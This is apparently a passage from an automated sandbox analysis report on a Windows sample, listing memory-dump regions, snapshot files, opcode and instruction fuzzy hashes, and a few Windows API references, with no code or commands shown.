                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: <8R$<8R
                                                                                              • API String ID: 0-2827036536
                                                                                              • Opcode ID: a179c3064f956497ef05194d646005700df9b90c313328b392dc6a0ae553c355
                                                                                              • Instruction ID: 61cbda370fb60d43378d86ded3aaa734ae197c978d722e190c386d2c70c855b9
                                                                                              • Opcode Fuzzy Hash: a179c3064f956497ef05194d646005700df9b90c313328b392dc6a0ae553c355
                                                                                              • Instruction Fuzzy Hash: 3352DF72F482059FCB08DEBCC5953CD77F2AB47354F209215E425ABFA4D62A890ACF94
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0$8
                                                                                              • API String ID: 0-46163386
                                                                                              • Opcode ID: 0931c198f8df3bf366cf80e23fe6c6acebd54e40b88177d3ed5c1d0ae8ee3a29
                                                                                              • Instruction ID: 5b0d9fdfc6fe1f90d905cf769bfb9305472576436b1898b21efd0e8dbe1931be
                                                                                              • Opcode Fuzzy Hash: 0931c198f8df3bf366cf80e23fe6c6acebd54e40b88177d3ed5c1d0ae8ee3a29
                                                                                              • Instruction Fuzzy Hash: C97256716087449FD715CF18C880BABBBE1BF98314F14891DFA898B392D775D948CB92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ~q4$~q4
                                                                                              • API String ID: 0-2985255961
                                                                                              • Opcode ID: 9f0be09aba6db6db7a23a9557fde8f66b1644583daa519a8a712f0219ca95d3e
                                                                                              • Instruction ID: acebad8db3aa8426c181707b19fdf9d9dcf29a57b645a408e9af83697dbcfb27
                                                                                              • Opcode Fuzzy Hash: 9f0be09aba6db6db7a23a9557fde8f66b1644583daa519a8a712f0219ca95d3e
                                                                                              • Instruction Fuzzy Hash: E312F876B492118FCF05CEBCC5D53DE7BF2AB6B324F206615C411EBB95C32A990A8B14
                                                                                              APIs
                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6CE291DC,?,?,00000008,?,?,6CE28E74,00000000), ref: 6CE2940E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionRaise
                                                                                              • String ID:
                                                                                              • API String ID: 3997070919-0
                                                                                              • Opcode ID: 36c0988ed125768b3ce445d88f0f37b6f0a90d686d40a2bfe78d90b21a444e46
                                                                                              • Instruction ID: b95e904d4d2b6e5746e5246724b83a82a55161ba3b961dd2b4bc0c7b93b4e867
                                                                                              • Opcode Fuzzy Hash: 36c0988ed125768b3ce445d88f0f37b6f0a90d686d40a2bfe78d90b21a444e46
                                                                                              • Instruction Fuzzy Hash: 30B11732611608CFD705CF28C486B957BB0FF46368F359658E8A9CF6A1C339E992CB40
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CE203AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: FeaturePresentProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 2325560087-0
                                                                                              • Opcode ID: 9f7b51b3e352bec7ae93c6862ed2012d484a289ff1fb450e1c683e4fb90832f4
                                                                                              • Instruction ID: 433929c71208786e97024f6930106783b29a89e5d1fb30f4d72b8349863d94aa
                                                                                              • Opcode Fuzzy Hash: 9f7b51b3e352bec7ae93c6862ed2012d484a289ff1fb450e1c683e4fb90832f4
                                                                                              • Instruction Fuzzy Hash: 3F517EB1E016598BDB19CF55C8A27AABBF0FB49718F30C52AD415EB781E3789940CF60
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ~
                                                                                              • API String ID: 0-1707062198
                                                                                              • Opcode ID: 47bc48253749bbccd36387d678e271a442dd4bf92590558d95ae7ed48be474bc
                                                                                              • Instruction ID: 1d90e042c8be6680e10f875c0be03913eff272a3064b354bfec0ab6573eb9ef8
                                                                                              • Opcode Fuzzy Hash: 47bc48253749bbccd36387d678e271a442dd4bf92590558d95ae7ed48be474bc
                                                                                              • Instruction Fuzzy Hash: 18813D729042614FCB12CE68884076BBBD1AF85324F19C67EECB99B3D2D6389C09D7D1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @
                                                                                              • API String ID: 0-2766056989
                                                                                              • Opcode ID: 1f87492e51453d5fe3f1d6a171d31c5fdddc7a98d4d73065cb900f3d66267ecf
                                                                                              • Instruction ID: 792e727f066091c40aad5b74fac4d781b286cf86cc37c4abeb73b12951271c83
                                                                                              • Opcode Fuzzy Hash: 1f87492e51453d5fe3f1d6a171d31c5fdddc7a98d4d73065cb900f3d66267ecf
                                                                                              • Instruction Fuzzy Hash: 4E3125709043009BDB14CF28D88167B77F4FF99328F10962DE99A5B3A1E7399D04C786
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapProcess
                                                                                              • String ID:
                                                                                              • API String ID: 54951025-0
                                                                                              • Opcode ID: e4d849900cf55eedb229df51970abf7722519f59a44c1bb736ac2b9806442cff
                                                                                              • Instruction ID: af6c385cf67d281e1a60092b934cd57dacd4cf448fd903c2965ac95143d19ee0
                                                                                              • Opcode Fuzzy Hash: e4d849900cf55eedb229df51970abf7722519f59a44c1bb736ac2b9806442cff
                                                                                              • Instruction Fuzzy Hash: B4A022B0300200CF8F00CF30828830C3BFCAB032E030A8038A808C2000FB3880E0EBA2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e2edcc9d8116daa6f1658d0883bdfb60c774d0e31ba6f87bbfce6ed58941d108
                                                                                              • Instruction ID: 647c0d7e3a9c583d7f4fc23804f149cc2302c00f21833394c95a094af90f49a4
                                                                                              • Opcode Fuzzy Hash: e2edcc9d8116daa6f1658d0883bdfb60c774d0e31ba6f87bbfce6ed58941d108
                                                                                              • Instruction Fuzzy Hash: 39727CB0609F808FD3658F3C8845797BFD6AB5A324F188B5DA0FA873D2C77561018B66
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b4aa2f900580760132ca230ffb94d44d2c1a1fdd6534b89ff778f90ef61833bf
                                                                                              • Instruction ID: 55adf0620eac41d47d57aa59a4e73f2f5626fb508b16532ad6848ac217ac6f8c
                                                                                              • Opcode Fuzzy Hash: b4aa2f900580760132ca230ffb94d44d2c1a1fdd6534b89ff778f90ef61833bf
                                                                                              • Instruction Fuzzy Hash: 9252B67090CB889FE736CF24C4847B7BBE1AB52314F15492EC6EB46B82C379A985C751
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 39063f267de1c4b7ad7c4dae0f3436c6d00b5b9179a226d4e1be1e4f4f8738be
                                                                                              • Instruction ID: 30732e5df9065963e374d484d671d2adf9c2b53723888bda713ab8680abf18b7
                                                                                              • Opcode Fuzzy Hash: 39063f267de1c4b7ad7c4dae0f3436c6d00b5b9179a226d4e1be1e4f4f8738be
                                                                                              • Instruction Fuzzy Hash: 9652D2315083498FCB16CF29C0906BABBE1FF88314F198A6DF99957352D774E989CB81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: eda36f71eba9765271182112f1f3655c34cc5f944bc2088baf291ead026e868a
                                                                                              • Instruction ID: 8667850e15a2a2a2ff84822100bfef2c2b82599dcfab97f6c5a77f1dc9c924aa
                                                                                              • Opcode Fuzzy Hash: eda36f71eba9765271182112f1f3655c34cc5f944bc2088baf291ead026e868a
                                                                                              • Instruction Fuzzy Hash: 1E22D7366087158BC72ADF18D8806BBB3E5FFC4315F19892DDAC697385DB34E8158B42
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 63bd2ae94ee1434e9248bdd05ceae172b98e2c335bfa8c5aee1af4a7d5257fe1
                                                                                              • Instruction ID: 4e49d00ad09325e7f6451a10d3c481d15667bc48bcb9ce1f6a077ffae2e10e40
                                                                                              • Opcode Fuzzy Hash: 63bd2ae94ee1434e9248bdd05ceae172b98e2c335bfa8c5aee1af4a7d5257fe1
                                                                                              • Instruction Fuzzy Hash: 18320270514B198FC36ACF29C68052BBBF1BF86710B614A2ED6A787E90D776F844CB14
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6dbb2f320eea0c9dc878a6c49c52daa75a874102e62c1879da87a0feb4cb0159
                                                                                              • Instruction ID: b4ffc51bdce93085ff3416038816008c665ab4d86dc2177ecff714aaca352b6a
                                                                                              • Opcode Fuzzy Hash: 6dbb2f320eea0c9dc878a6c49c52daa75a874102e62c1879da87a0feb4cb0159
                                                                                              • Instruction Fuzzy Hash: 6332C3F0A14B409FD3A1CF2DC841793BBE8AB4A710F15896EE5AEC7311D7746901CBA9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 72ef3389d17b5c2d7356fca882b754ee43f181ee348d4ceda7fd19fbe0bcaa8a
                                                                                              • Instruction ID: 91980ab9c83395c213c33e5f364b3640859b0060d5fc0d0bfb736ecff03a71dc
                                                                                              • Opcode Fuzzy Hash: 72ef3389d17b5c2d7356fca882b754ee43f181ee348d4ceda7fd19fbe0bcaa8a
                                                                                              • Instruction Fuzzy Hash: 87F1BA356083458FC729CF29C88166BFBE6EFD8304F08882DE5D987751EA75E808CB56
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 20b78bb781b3b6ef422163dc69e0f1e15217c8ffd0916a4428c1e9023a162aa9
                                                                                              • Instruction ID: 866facee161f63d3843c2de19a9870e583651ed11f91ec6c7548aca9e9b3d494
                                                                                              • Opcode Fuzzy Hash: 20b78bb781b3b6ef422163dc69e0f1e15217c8ffd0916a4428c1e9023a162aa9
                                                                                              • Instruction Fuzzy Hash: 1EB11575604201ABD7108F25EC41B1BBBE2EF89754F548A3EF8A4A73E1D7359C18CB46
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a18edf71ab7c4557d5fcde03e234477598ad2c4b0a424cc084650436352cd33b
                                                                                              • Instruction ID: 8ae4139a7a1ee57e667f92e922780900f3702de276460d7886235f27d072b93b
                                                                                              • Opcode Fuzzy Hash: a18edf71ab7c4557d5fcde03e234477598ad2c4b0a424cc084650436352cd33b
                                                                                              • Instruction Fuzzy Hash: A57125B1D106258BCB24CF68C8926BB73B0FF55364B19012ADC96AB3C0F7789901CB95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a88d76967b2daf3f2efff3a844aac06e3f491c903741e30a63c027bd60e8f0a4
                                                                                              • Instruction ID: a3959c2dce5a44890eadd78ecfea8076dffd39e4de8dd004c9419256fd404f4d
                                                                                              • Opcode Fuzzy Hash: a88d76967b2daf3f2efff3a844aac06e3f491c903741e30a63c027bd60e8f0a4
                                                                                              • Instruction Fuzzy Hash: EFC17DB2A187458FC371CF28DC96BABB7E1BF85318F08492DD2D9C6242D778A155CB05
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 31f0a244bfeedf4d2fe5c236b5ecc0ab223cf0718e73755616558d1f16e56004
                                                                                              • Instruction ID: 92f17fade0c23e3d58089a69307f98310d675bc9be431f78441824d2aa53fc99
                                                                                              • Opcode Fuzzy Hash: 31f0a244bfeedf4d2fe5c236b5ecc0ab223cf0718e73755616558d1f16e56004
                                                                                              • Instruction Fuzzy Hash: 0C5136357093208FD7209F2ABCC156FB792EB87720F954A6ED89957391C335AC02C799
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0174b772800c3c7c2dde55edf2594ff59bb88d0dd10078834f033982e170eb99
                                                                                              • Instruction ID: 6b2350d7547ca08adef2addc0e24b07de2f59ff7216ba4d1edc785221df2f349
                                                                                              • Opcode Fuzzy Hash: 0174b772800c3c7c2dde55edf2594ff59bb88d0dd10078834f033982e170eb99
                                                                                              • Instruction Fuzzy Hash: 35518EB16083548FE314DF29D49035FBBE1BBC4308F444A2EE4E583350E779D6088B86
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c45e5de18c62c5ef11a818dd649345c6e4072f57de5560c187fd8cc5db5970d8
                                                                                              • Instruction ID: fc9b2fbdfab4c9e6437eb8afe22d687072bb5d3563c45dd59b5db8260e9c9319
                                                                                              • Opcode Fuzzy Hash: c45e5de18c62c5ef11a818dd649345c6e4072f57de5560c187fd8cc5db5970d8
                                                                                              • Instruction Fuzzy Hash: 2641CA399557428BDB2ADE38F6A85C6BFA4BE2235035C425DC8B28B742C3258492CF91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a36336d4cca3d322867e557288c4019493b1e22bbbc1b87fd4ee6ac83c9ea7e2
                                                                                              • Instruction ID: 245dc019f625c99669d254eaa5e68d2b03bc3bc0d7a7aeb51f18b0fa7c75be00
                                                                                              • Opcode Fuzzy Hash: a36336d4cca3d322867e557288c4019493b1e22bbbc1b87fd4ee6ac83c9ea7e2
                                                                                              • Instruction Fuzzy Hash: 3F3124745057408BDB34DF24C8957ABB3B0EF81364F048A2EE8C5AB3C1E7388900CB9A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: eb6e413231f17479cbb3e44948bd4539d84d8f69a4f0dd54e396f8b8a1564795
                                                                                              • Instruction ID: 7d952a950d14cce2e32779a30ffe1e8ece893fb217347fe9f8e4a8b189c6522c
                                                                                              • Opcode Fuzzy Hash: eb6e413231f17479cbb3e44948bd4539d84d8f69a4f0dd54e396f8b8a1564795
                                                                                              • Instruction Fuzzy Hash: 52310638116B818BCB06AF38F7B82C17FA47FAB214368179DD5A18B766C3159153CF91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c0ed1be57d9bc1bdf966c4bc4fd16fe59d500d12862ad89900e111f8d544553c
                                                                                              • Instruction ID: 15d86c099bd7773a91311d3b30e2db351ad715ed73e880caaab2c8d588d41573
                                                                                              • Opcode Fuzzy Hash: c0ed1be57d9bc1bdf966c4bc4fd16fe59d500d12862ad89900e111f8d544553c
                                                                                              • Instruction Fuzzy Hash: FA31A9358127128BCF02EE3896990C5BFB0BE2A260728579DCDA18B6A5C3244063CF82
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1739915229.00000000003D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1739893713.00000000003D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3d0000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a5304366060603d9e6070e924a72f504a79de3e323384e501256cdf50a4fd8c0
                                                                                              • Instruction ID: 9fd40d4c1960a09690a7956df2c49e6614d8c8a03441a9831fb122f6a271fd85
                                                                                              • Opcode Fuzzy Hash: a5304366060603d9e6070e924a72f504a79de3e323384e501256cdf50a4fd8c0
                                                                                              • Instruction Fuzzy Hash: 94F02B3F75921D0BE311DD69ECC097BB396DBC6318B1D8138EA41E3701C574E906C2A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
                                                                                              • Instruction ID: 247cc700ffb986ed221f37ebd40b02461966140358f2c088683116852c383a7b
                                                                                              • Opcode Fuzzy Hash: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
                                                                                              • Instruction Fuzzy Hash: B8E08C32926238EBCB14CF98C904A8AB3FCEB48B24B2104AAB501D3601C274DE01C7C0

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
